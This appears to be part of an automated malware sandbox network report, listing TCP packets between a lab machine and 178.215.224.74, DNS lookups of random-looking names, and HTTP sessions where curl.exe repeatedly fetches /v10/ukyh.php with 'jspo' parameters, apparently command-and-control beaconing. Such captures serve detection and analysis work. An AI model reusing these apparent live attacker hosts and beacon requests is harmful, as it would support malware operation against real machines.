                                        Nov 21, 2024 20:02:20.777272940 CET8050072178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:20.989624977 CET8050071178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:20.989748955 CET5007180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:21.111444950 CET5007380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:21.232743979 CET8050073178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:21.232954025 CET5007380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:21.233371019 CET5007380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:21.353815079 CET8050073178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.030884981 CET8050072178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.032632113 CET5007280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.117845058 CET5007480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.152532101 CET8050072178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.152712107 CET5007280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.237382889 CET8050074178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.237462997 CET5007480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.237582922 CET5007480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.357147932 CET8050074178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.497236967 CET8050073178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.498723984 CET5007380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.576618910 CET5007580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.620160103 CET8050073178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.620403051 CET5007380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.696640015 CET8050075178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:22.696793079 CET5007580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.696929932 CET5007580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:22.816896915 CET8050075178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:23.593422890 CET8050074178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:23.594122887 CET5007480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:23.714381933 CET8050074178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:23.714453936 CET5007480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:23.944788933 CET5000580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:24.028208971 CET8050075178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:24.028827906 CET5007580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:24.065922022 CET8050005178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:24.142070055 CET5007680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:24.149934053 CET8050075178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:24.150022984 CET5007580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:24.190975904 CET5007780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:24.266998053 CET8050076178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:24.267151117 CET5007680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:24.267383099 CET5007680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:24.315606117 CET8050077178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:24.315747976 CET5007780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:24.315921068 CET5007780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:24.386789083 CET8050076178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:24.435389042 CET8050077178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:25.579082012 CET8050077178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:25.579745054 CET5007780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:25.600330114 CET8050076178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:25.600958109 CET5007680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:25.699860096 CET8050077178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:25.700027943 CET5007780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:25.721973896 CET8050076178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:25.722115993 CET5007680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:25.933525085 CET5007880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:25.941996098 CET5007980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:25.991621971 CET8050071178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:25.991758108 CET5007180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:26.053057909 CET8050078178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:26.054362059 CET5007880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:26.054496050 CET5007880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:26.061506987 CET8050079178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:26.062311888 CET5007980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:26.062470913 CET5007980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:26.180663109 CET8050078178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:26.188724041 CET8050079178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:27.371377945 CET8050079178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:27.371922970 CET5007980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:27.427364111 CET8050078178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:27.427772045 CET5007880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:27.491861105 CET8050079178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:27.491966963 CET5007980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:27.549366951 CET8050078178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:27.549496889 CET5007880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:27.576709032 CET5008080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:27.696933031 CET8050080178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:27.697002888 CET5008080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:27.697149992 CET5008080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:27.816625118 CET8050080178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:27.882652044 CET5008180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:28.002381086 CET8050081178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:28.002459049 CET5008180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:28.002587080 CET5008180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:28.122219086 CET8050081178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.023269892 CET8050080178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.024647951 CET5008080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:29.034234047 CET5007180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:29.034404993 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:29.198664904 CET8050071178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.198708057 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.198812962 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:29.198878050 CET8050080178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.198939085 CET5008080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:29.198939085 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:29.199002028 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:29.314779997 CET8050081178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.315479994 CET5008180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:29.323617935 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.323635101 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.323646069 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.323745966 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.323755980 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.323889017 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.323898077 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.324016094 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.442882061 CET8050081178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:29.442981005 CET5008180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:30.073793888 CET5008380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:30.193422079 CET8050083178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:30.193516970 CET5008380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:30.193702936 CET5008380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:30.313209057 CET8050083178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:30.513305902 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:30.513444901 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:30.611207962 CET5008480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:30.732131958 CET8050084178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:30.732224941 CET5008480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:30.732347012 CET5008480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:30.852020979 CET8050084178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:31.552397013 CET8050083178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:31.555124998 CET5008380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:31.675435066 CET8050083178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:31.675543070 CET5008380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:31.994302034 CET8050084178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:31.994790077 CET5008480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:32.047432899 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:32.047487974 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:32.114675045 CET8050084178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:32.114764929 CET5008480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:32.167072058 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:32.167088032 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:32.167149067 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:32.198656082 CET5008580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:32.318762064 CET8050085178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:32.318897009 CET5008580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:32.319092989 CET5008580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:32.441421032 CET8050085178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:32.480151892 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:32.480263948 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:32.568372965 CET5008680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:32.689259052 CET8050086178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:32.689341068 CET5008680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:32.689687014 CET5008680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:32.809173107 CET8050086178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:33.591794968 CET8050085178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:33.594846964 CET5008580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:33.701011896 CET5008780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:33.715946913 CET8050085178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:33.716012955 CET5008580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:33.821382046 CET8050087178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:33.821995974 CET5008780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:33.822293043 CET5008780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:33.941694975 CET8050087178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:34.010883093 CET8050086178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:34.011486053 CET5008680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:34.031821966 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:34.031888962 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:34.134278059 CET8050086178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:34.134398937 CET5008680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:34.152075052 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:34.152106047 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:34.152141094 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:34.468791008 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:34.468868017 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:34.765084028 CET5008880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:34.884704113 CET8050088178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:34.885121107 CET5008880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:34.885240078 CET5008880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:35.004805088 CET8050088178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:35.180377007 CET8050087178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:35.180953026 CET5008780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:35.301052094 CET8050087178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:35.301276922 CET5008780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:35.673000097 CET5008980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:35.799422026 CET8050089178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:35.799655914 CET5008980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:35.799936056 CET5008980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:35.922852993 CET8050089178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:36.151442051 CET8050088178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:36.152040958 CET5008880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:36.265197992 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:36.272274017 CET8050088178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:36.272383928 CET5008880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:36.386250019 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:36.688836098 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:36.688970089 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:37.117151022 CET8050089178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:37.117618084 CET5008980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:37.238085985 CET8050089178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:37.238168001 CET5008980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:37.451088905 CET5009080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:37.463884115 CET5009180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:37.570851088 CET8050090178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:37.571038008 CET5009080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:37.571372032 CET5009080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:37.583722115 CET8050091178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:37.583848953 CET5009180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:37.584041119 CET5009180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:37.811614990 CET8050090178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:37.811644077 CET8050091178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:38.908029079 CET8050091178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:38.908683062 CET5009180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:38.912961960 CET8050090178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:38.913371086 CET5009080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:38.918868065 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:38.918972969 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:39.028702021 CET8050091178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.028929949 CET5009180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:39.033570051 CET8050090178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.033662081 CET5009080192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:39.038531065 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.038619995 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:39.038718939 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.038784027 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:39.038821936 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.038877964 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.038881063 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:39.038945913 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.038978100 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.039103031 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.039135933 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.039288998 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.039338112 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.039530993 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.039558887 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.039630890 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.039683104 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.039783001 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.039809942 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.039969921 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.040019989 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.081516027 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.158452988 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.158679008 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.158751965 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.500746965 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.500840902 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:39.860248089 CET5009280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:39.983144045 CET8050092178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:39.983243942 CET5009280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:39.983726025 CET5009280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:40.048504114 CET5009380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:40.103425980 CET8050092178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:40.169523954 CET8050093178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:40.169630051 CET5009380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:40.169918060 CET5009380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:40.290018082 CET8050093178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:41.290039062 CET8050092178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:41.290705919 CET5009280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:41.364527941 CET5009480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:41.424498081 CET8050092178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:41.424612999 CET5009280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:41.484306097 CET8050094178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:41.484441996 CET5009480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:41.497349024 CET5009480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:41.536570072 CET8050093178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:41.537112951 CET5009380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:41.616975069 CET8050094178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:41.657094955 CET8050093178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:41.657181025 CET5009380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:41.658937931 CET5009580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:41.778742075 CET8050095178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:41.778831959 CET5009580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:41.781832933 CET5009580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:41.901778936 CET8050095178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:42.797537088 CET8050094178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:42.798114061 CET5009480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:42.918090105 CET8050094178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:42.918287039 CET5009480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:43.138716936 CET8050095178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:43.140523911 CET5009580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:43.260682106 CET8050095178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:43.260822058 CET5009580192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:44.151693106 CET5009680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:44.271459103 CET8050096178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:44.271565914 CET5009680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:44.272073030 CET5009680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:44.392525911 CET8050096178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:44.501920938 CET8050082178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:44.502013922 CET5008280192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:44.540144920 CET5009780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:44.660048962 CET8050097178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:44.660283089 CET5009780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:44.660490990 CET5009780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:44.780327082 CET8050097178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:45.550164938 CET8050096178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:45.553093910 CET5009680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:45.617414951 CET5009880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:45.673511028 CET8050096178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:45.678256989 CET5009680192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:45.737356901 CET8050098178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:45.740675926 CET5009880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:45.747179031 CET5009880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:45.867805004 CET8050098178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:46.032340050 CET8050097178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:46.033662081 CET5009780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:46.111402035 CET5009980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:46.154309988 CET8050097178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:46.154473066 CET5009780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:46.231390953 CET8050099178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:46.231493950 CET5009980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:46.233840942 CET5009980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:46.353579998 CET8050099178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:47.543230057 CET8050099178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:47.543744087 CET5009980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:47.666191101 CET8050099178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:47.666261911 CET5009980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:48.183474064 CET8050098178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:48.231632948 CET5009880192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:02:53.187510967 CET8050098178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:02:53.187650919 CET5009880192.168.2.4178.215.224.74

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 21, 2024 19:58:44.892199993 CET5008453192.168.2.41.1.1.1
                                        Nov 21, 2024 19:58:45.123275042 CET53500841.1.1.1192.168.2.4
                                        Nov 21, 2024 20:01:00.978250980 CET53595931.1.1.1192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 21, 2024 19:58:44.892199993 CET192.168.2.41.1.1.10xfe95Standard query (0)mCpLognXwrhUlFWj.mCpLognXwrhUlFWjA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 21, 2024 19:58:45.123275042 CET1.1.1.1192.168.2.40xfe95Name error (3)mCpLognXwrhUlFWj.mCpLognXwrhUlFWjnonenoneA (IP address)IN (0x0001)false
                                        Nov 21, 2024 20:01:00.978250980 CET1.1.1.1192.168.2.40x4ebbName error (3)GyxNFpxuLvDE.GyxNFpxuLvDEnonenoneA (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • 178.215.224.252
                                        • 178.215.224.74

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449743178.215.224.252805568C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 19:59:39.210114956 CET98OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.252
                                        User-Agent: curl/7.83.1
                                        Accept: */*


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.449804178.215.224.74806692C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:06.814177036 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:08.171070099 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:07 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.449807178.215.224.74806024C:\Windows\SysWOW64\curl.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:00:08.516844988 CET97OUTGET /v10/ukyh.php?jspo=5 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:00:09.825196981 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:00:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.449813178.215.224.74802060C:\Windows\SysWOW64\curl.exe
